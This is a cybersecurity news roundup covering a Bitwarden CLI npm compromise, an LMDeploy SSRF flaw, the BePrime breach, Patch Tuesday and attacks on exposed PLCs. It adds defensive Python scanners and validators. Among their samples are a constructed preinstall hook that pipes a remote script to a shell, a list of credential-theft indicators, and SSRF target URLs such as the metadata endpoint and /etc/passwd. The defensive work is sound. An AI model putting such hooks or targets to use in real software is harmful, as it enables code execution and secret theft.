Top 5 Cyber Security News Stories
1. Bitwarden CLI Compromised in Supply Chain Attack
The command-line interface for popular password manager Bitwarden was briefly hijacked on April 22 as part of an ongoing supply chain campaign exploiting Checkmarx’s npm distribution pipeline. The malicious package, @bitwarden/cli@2026.4.0, was live for roughly 90 minutes before detection and contained a preinstall hook that harvested GitHub and npm tokens, SSH keys, environment variables, shell history, and cloud secrets — encrypting the stolen data with AES-256-GCM and exfiltrating it to a domain impersonating Checkmarx. Bitwarden confirmed no end-user vault data was accessed, revoked compromised access, and deprecated the poisoned release. The incident underscores just how thin the margin for error has become in software supply chains: a narrow window of exposure was all it took to put developer credentials and CI/CD secrets at risk.
Source: The Hacker News · SecurityWeek
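The vector in this story was an install-time hook: npm runs a package's preinstall, install and postinstall scripts automatically during `npm install`, so a poisoned release executes before the developer has looked at anything. The following is an added example, not Bitwarden's, npm's or Checkmarx's code; it audits a package.json for such hooks and flags a few command patterns that deserve a closer look. Both manifests are constructed samples (example-pkg, cdn.example.invalid), not real packages.

```python
"""Flag install-time lifecycle scripts in an npm package manifest.

Added example; not Bitwarden's, npm's or Checkmarx's code. A compromised release
can run arbitrary code the moment `npm install` executes its preinstall, install
or postinstall hook, so this audits the package.json of a downloaded tarball for
such hooks and for a few command patterns that warrant review. The two manifests
below are constructed samples, not real packages.
"""
import json

# Scripts npm runs automatically when a dependency is installed from the registry.
INSTALL_TIME_SCRIPTS = ("preinstall", "install", "postinstall")

# Substrings that warrant manual review when found in an install hook
# (illustrative list, not a complete signature set).
SUSPICIOUS_TOKENS = (
    "curl ", "wget ", "node -e", "base64", "eval(",
    "/.ssh", ".npmrc", "GITHUB_TOKEN", "NPM_TOKEN", "AWS_SECRET",
)

# Constructed: a manifest with build-only scripts.
BENIGN_MANIFEST = json.dumps({
    "name": "example-pkg",
    "version": "1.0.0",
    "scripts": {"build": "tsc -p .", "test": "vitest run"},
})

# Constructed: a manifest whose preinstall hook pipes a remote script to a shell.
SUSPECT_MANIFEST = json.dumps({
    "name": "example-pkg",
    "version": "1.0.1",
    "scripts": {
        "build": "tsc -p .",
        "preinstall": "curl -fsSL https://cdn.example.invalid/bootstrap.sh | sh",
    },
})


def audit_manifest(package_json_text: str) -> dict:
    """Return the package identity plus every install-time hook it declares."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    hooks = {}
    for name in INSTALL_TIME_SCRIPTS:
        command = scripts.get(name)
        if command is None:
            continue
        hooks[name] = {
            "command": command,
            "indicators": [tok for tok in SUSPICIOUS_TOKENS if tok in command],
        }
    return {
        "name": manifest.get("name"),
        "version": manifest.get("version"),
        "install_hooks": hooks,
    }


def has_install_hooks(report: dict) -> bool:
    """True when the package will execute code during `npm install`."""
    return bool(report["install_hooks"])


if __name__ == "__main__":
    for text in (BENIGN_MANIFEST, SUSPECT_MANIFEST):
        report = audit_manifest(text)
        status = "REVIEW" if has_install_hooks(report) else "clean"
        print(f"{report['name']}@{report['version']}: {status}")
        for hook, info in report["install_hooks"].items():
            print(f"  {hook}: {info['command']}  indicators={info['indicators']}")
```

In practice the manifest comes from `npm pack <name>@<version>`, which downloads the tarball without running anything; any hook at all is worth reading before the release is adopted, whether or not an indicator matches. Setting `ignore-scripts=true` in CI's npm config stops these hooks from running at all, and a 90-minute exposure window is a strong argument against installing releases the moment they are published.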
2. LMDeploy AI Toolkit Exploited Within 13 Hours of Disclosure
A high-severity Server-Side Request Forgery flaw in LMDeploy, the open-source toolkit used to deploy and serve large language models, went from public advisory to active exploitation in under 13 hours. Tracked as CVE-2026-33626 (CVSS 7.5), the vulnerability sits in the vision-language image loader, which fetches arbitrary URLs without validating internal or private IP addresses. Sysdig’s Threat Research Team captured an attacker probing AWS metadata services, Redis, MySQL, and internal admin interfaces through the SSRF primitive in a single eight-minute session — rotating between vision-language models to avoid detection. Every version of LMDeploy through 0.12.0 with vision-language support is affected, and no official patch was available at the time of exploitation.
Source: The Hacker News · Sysdig
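The flaw described above is the classic server-side request forgery shape: a loader that fetches whatever URL it is handed, so the caller can point it at the cloud metadata endpoint, a local Redis or MySQL port, or an internal admin page. The following is an added example, not LMDeploy's code and not a reproduction of its image loader; it shows the check such a loader needs before fetching. The DEMO_RESOLVER and its DNS table are constructed so the code runs offline; real_resolver is what a deployment would pass instead.

```python
"""Reject fetch targets that point at internal, loopback, link-local or metadata addresses.

Added example; not LMDeploy's code and not a reproduction of its image loader.
It shows the check that CVE-2026-33626 lacked: before an image URL is fetched,
the scheme is restricted and every address the host resolves to must be public.
DEMO_RESOLVER is a constructed DNS table so the example runs offline; a real
deployment passes real_resolver instead.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Ranges that must never be reachable from a server-side fetch but that older
# Python versions do not class as private.
EXTRA_BLOCKED = (
    ipaddress.ip_network("100.64.0.0/10"),  # carrier-grade NAT / shared address space
)


def real_resolver(hostname: str) -> list:
    """Every A/AAAA answer for the name; all of them must pass the check."""
    infos = socket.getaddrinfo(hostname, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


# Constructed DNS table (assumption for the demo; .invalid names never resolve for real).
DEMO_TABLE = {
    "images.example.invalid": ["93.184.216.34"],
    "rebind.example.invalid": ["93.184.216.34", "10.0.0.5"],  # one internal answer poisons the set
}


def DEMO_RESOLVER(hostname: str) -> list:
    if hostname not in DEMO_TABLE:
        raise socket.gaierror(f"constructed resolver has no entry for {hostname}")
    return DEMO_TABLE[hostname]


def is_public_address(ip) -> bool:
    """True only for globally routable unicast addresses."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:10.0.0.1 is really 10.0.0.1
    if any(ip in net for net in EXTRA_BLOCKED):
        return False
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_fetch_url(url: str, resolve=real_resolver):
    """Return (allowed, reason, resolved_addresses). Fails closed on any doubt."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} is not allowed", []
    host = parts.hostname
    if not host:
        return False, "URL has no host", []
    try:
        addresses = [ipaddress.ip_address(host)]  # literal IP, no lookup needed
    except ValueError:
        try:
            addresses = [ipaddress.ip_address(a) for a in resolve(host)]
        except (socket.gaierror, ValueError) as exc:
            return False, f"could not resolve {host}: {exc}", []
    if not addresses:
        return False, f"{host} resolved to nothing", []
    for ip in addresses:
        if not is_public_address(ip):
            return False, f"{host} maps to non-public address {ip}", [str(a) for a in addresses]
    return True, "ok", [str(a) for a in addresses]


if __name__ == "__main__":
    for candidate in (
        "https://images.example.invalid/cat.png",
        "http://169.254.169.254/latest/meta-data/",
        "http://127.0.0.1:6379/",
        "http://[::ffff:10.0.0.1]/admin",
        "file:///etc/passwd",
        "https://rebind.example.invalid/cat.png",
    ):
        allowed, reason, addrs = validate_fetch_url(candidate, resolve=DEMO_RESOLVER)
        print(f"{'ALLOW' if allowed else 'BLOCK':5} {candidate}  ({reason})")
```

Two caveats matter in production: the HTTP client must connect to the address that passed the check rather than resolving the name a second time (otherwise a rebinding DNS record defeats the validation), and every redirect hop has to go through the same function, since a public host can simply 302 to the metadata address.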
3. Cyber Security Firm BePrime Breached — Clients’ Surveillance Feeds Exposed
A threat actor compromised BePrime, a managed security services provider headquartered in Nuevo León, Mexico, after discovering that privileged administrator accounts had no multifactor authentication. Using stolen Cisco Meraki API keys, the attacker seized control of 1,858 network devices and more than 2,600 connected endpoints, then published screenshots of live surveillance camera feeds from client offices — including facilities belonging to Iberdrola, ArcelorMittal, Whirlpool, and Alsea. The 12.6 GB data dump included plaintext credentials, transaction records, and security audit reports. BePrime’s response drew additional scrutiny after the company issued legal threats against journalists covering the incident rather than offering a transparent accounting of what happened.
Source: DataBreaches.net · The Register
4. Microsoft’s Record-Setting Patch Tuesday Fixes SharePoint Zero-Day
Microsoft’s April 2026 Patch Tuesday addressed 167 vulnerabilities — the second-largest release on record — including an actively exploited SharePoint Server spoofing zero-day tracked as CVE-2026-32201 (CVSS 6.5). The flaw allows unauthenticated remote attackers to present falsified information, opening the door to phishing and social engineering attacks against organizations running SharePoint Enterprise Server 2016, Server 2019, and Server Subscription Edition. CISA added the vulnerability to its Known Exploited Vulnerabilities catalog and set a federal remediation deadline of April 28. Separately, CISA also flagged four additional actively exploited flaws on April 25 — two in SimpleHelp (CVE-2024-57726, CVE-2024-57728), one in Samsung MagicINFO 9 Server (CVE-2024-7399), and one in end-of-life D-Link DIR-823X routers (CVE-2025-29635) — with a May 8 deadline.
Source: BleepingComputer · SecurityWeek
5. Iran-Linked Hackers Disrupt U.S. Critical Infrastructure via Exposed PLCs
Six federal agencies — the FBI, CISA, NSA, EPA, DOE, and U.S. Cyber Command — issued a joint advisory warning that an Iranian-affiliated APT group has been actively exploiting internet-facing Rockwell Automation/Allen-Bradley programmable logic controllers across water, energy, and government facilities since at least March 2026. The attackers used overseas IP addresses and Rockwell’s own Studio 5000 Logix Designer software to establish connections, manipulate project files, and alter data displayed on HMI and SCADA panels. Several victims reported operational disruption and financial losses. The advisory urges organizations to immediately remove affected controllers from direct internet exposure and audit access logs on ports 44818, 2222, 102, and 502.
Source: CISA Advisory AA26-097A · The Hacker News
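The advisory's two asks, remove controllers from direct internet exposure and audit access logs on ports 44818, 2222, 102 and 502, are easy to turn into a repeatable check. The following is an added example, not material from the CISA advisory; it parses key=value firewall records and reports connections to those ports that originate outside the plant's own address ranges. The log lines and the INTERNAL_NETS ranges are constructed assumptions for the demo.

```python
"""Find inbound connections to PLC service ports from outside the plant's own networks.

Added example; not from the CISA advisory, and the log lines are constructed.
It parses key=value firewall records and reports allowed sessions (and denied
probes) from sources outside the locally defined internal ranges to the ports
the advisory asks operators to audit: 44818, 2222, 102 and 502.
"""
import ipaddress
import re
from collections import defaultdict
from typing import Optional

# Ports named in the advisory and the protocols commonly carried on them.
WATCHED_PORTS = {
    44818: "EtherNet/IP (CIP explicit messaging)",
    2222: "EtherNet/IP (CIP implicit I/O)",
    102: "ISO-TSAP (S7comm)",
    502: "Modbus/TCP",
}

# Assumption: the plant's own address space. Anything else is treated as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed firewall log: ISO timestamp followed by key=value fields.
LOG_SAMPLE = """\
2026-04-20T03:12:44Z action=allow proto=tcp src=203.0.113.77 spt=51234 dst=10.20.1.15 dpt=44818
2026-04-20T03:12:51Z action=allow proto=tcp src=10.20.1.40 spt=40111 dst=10.20.1.15 dpt=44818
2026-04-20T03:13:02Z action=allow proto=tcp src=203.0.113.77 spt=51240 dst=10.20.1.16 dpt=502
2026-04-20T03:13:05Z action=allow proto=tcp src=198.51.100.9 spt=33003 dst=10.20.1.17 dpt=102
2026-04-20T03:13:09Z action=deny proto=tcp src=198.51.100.9 spt=33004 dst=10.20.1.17 dpt=2222
2026-04-20T03:14:20Z action=allow proto=tcp src=10.20.1.40 spt=40222 dst=10.20.1.18 dpt=443
"""

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line: str) -> Optional[dict]:
    """Turn one record into a dict; None for lines that lack the fields we need."""
    fields = line.split(maxsplit=1)
    if len(fields) != 2:
        return None
    record = {"ts": fields[0]}
    record.update(KV_RE.findall(fields[1]))
    try:
        record["dpt"] = int(record["dpt"])
        record["src_ip"] = ipaddress.ip_address(record["src"])
        record["dst"]
    except (KeyError, ValueError):
        return None
    return record


def is_internal(ip) -> bool:
    return any(ip in net for net in INTERNAL_NETS)


def find_exposed_plc_access(log_text: str) -> dict:
    """Split external-source traffic to watched ports into allowed sessions and denied probes."""
    result = {"allowed": [], "denied": []}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["dpt"] not in WATCHED_PORTS or is_internal(rec["src_ip"]):
            continue
        finding = {
            "ts": rec["ts"], "src": rec["src"], "dst": rec["dst"],
            "dpt": rec["dpt"], "service": WATCHED_PORTS[rec["dpt"]],
        }
        bucket = "allowed" if rec.get("action") == "allow" else "denied"
        result[bucket].append(finding)
    return result


def summarize_by_source(findings: list) -> dict:
    """External source address -> sorted list of PLC ports it reached."""
    ports = defaultdict(set)
    for f in findings:
        ports[f["src"]].add(f["dpt"])
    return {src: sorted(p) for src, p in ports.items()}


if __name__ == "__main__":
    report = find_exposed_plc_access(LOG_SAMPLE)
    for f in report["allowed"]:
        print(f"ALLOWED  {f['ts']} {f['src']} -> {f['dst']}:{f['dpt']} ({f['service']})")
    for f in report["denied"]:
        print(f"denied   {f['ts']} {f['src']} -> {f['dst']}:{f['dpt']} ({f['service']})")
    print("exposed to:", summarize_by_source(report["allowed"]))
```

Any entry in the allowed list is a controller reachable from the internet and should be treated as the exposure the advisory describes; the denied list shows which external addresses are already probing. Running this over historical logs back to March 2026 gives a first answer to whether the affected controllers were contacted before they were taken offline.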
